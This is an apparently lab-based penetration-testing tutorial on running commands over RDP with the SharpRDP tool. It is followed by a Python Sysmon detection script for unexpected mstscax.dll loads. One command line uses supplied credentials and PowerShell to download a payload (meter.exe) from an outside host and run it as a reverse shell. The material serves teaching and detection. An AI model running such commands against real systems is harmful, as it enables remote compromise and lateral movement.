RDP as a Console

Although RDP is most often associated with the mstsc GUI client, it can also be used as a command-line tool. This technique reduces our overhead while still relying on the RDP protocol, which will often blend in well with typical network traffic.

The RDP application (mstsc.exe) builds upon the terminal services library mstscax.dll. This library exposes interfaces to both scripts and compiled code through COM objects.

SharpRDP is a C# application that uses the non-scriptable interfaces exposed by mstscax.dll to perform authentication in the same way as mstsc.exe.

Once authentication is performed, SharpRDP allows us to execute code through SendKeys. In this manner, no GUI access is required and setting up a reverse tunnel is unnecessary.

To demonstrate this, we’ll use the pre-compiled version of SharpRDP. We’ll specify the computername, username, and password along with the command to be executed. In this example, we’ll simply execute a reverse TCP shell using PowerShell:

SharpRDP.exe
sharprdp.exe computername=appsrv01 command="powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.69/meter.exe','C:\Windows\Tasks\meter.exe'); C:\Windows\Tasks\meter.exe" username=corp1\dave password=lab
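
Because SharpRDP drives mstscax.dll from its own process rather than through mstsc.exe, the library load is a detection point on the host where the tool runs. The Python below is an added example, not part of the original page or of SharpRDP; it assumes Sysmon image-load logging (Event ID 7) is enabled, and the sample events, the make_event helper and the allowlist of expected loader paths are constructed for illustration.

```python
import ntpath
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Assumption: only the stock RDP client at these paths should load the library.
EXPECTED_LOADERS = {r"c:\windows\system32\mstsc.exe", r"c:\windows\syswow64\mstsc.exe"}

def make_event(image, loaded, event_id=7, host="wks01"):
    """Build a constructed Sysmon event, trimmed to the fields used here."""
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f"<Computer>{host}</Computer></System><EventData>"
            f'<Data Name="Image">{image}</Data>'
            f'<Data Name="ImageLoaded">{loaded}</Data></EventData></Event>')

# Constructed sample data, not real telemetry.
SAMPLE_EVENTS = [
    make_event(r"C:\Windows\System32\mstsc.exe", r"C:\Windows\System32\mstscax.dll"),
    make_event(r"C:\Users\dave\Desktop\SharpRDP.exe", r"C:\Windows\System32\mstscax.dll"),
    make_event(r"C:\Users\dave\AppData\Local\Temp\mstsc.exe", r"C:\Windows\System32\MSTSCAX.DLL"),
    make_event(r"C:\Windows\System32\notepad.exe", r"C:\Windows\System32\uxtheme.dll"),
]

def parse_image_load(xml_text):
    """Return (computer, image, image_loaded) for Event ID 7, else None."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "7":
        return None
    data = {d.get("Name"): d.text or "" for d in root.iterfind("e:EventData/e:Data", NS)}
    computer = root.findtext("e:System/e:Computer", default="", namespaces=NS)
    return computer, data.get("Image", ""), data.get("ImageLoaded", "")

def unexpected_rdp_library_loads(events):
    """List (computer, image) pairs where an unexpected process loaded mstscax.dll."""
    hits = []
    for xml_text in events:
        parsed = parse_image_load(xml_text)
        if parsed is None:
            continue
        computer, image, loaded = parsed
        # Match on the DLL file name, case-insensitively, whatever directory it sits in.
        if ntpath.basename(loaded).lower() != "mstscax.dll":
            continue
        # Compare the full loader path so a renamed copy called mstsc.exe still alerts.
        if image.lower() not in EXPECTED_LOADERS:
            hits.append((computer, image))
    return hits

if __name__ == "__main__":
    for computer, image in unexpected_rdp_library_loads(SAMPLE_EVENTS):
        print(f"{computer}: mstscax.dll loaded by {image}")
```

Other legitimate RDP clients and management consoles may also load the library, so the allowlist should be baselined per environment before alerting on it.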
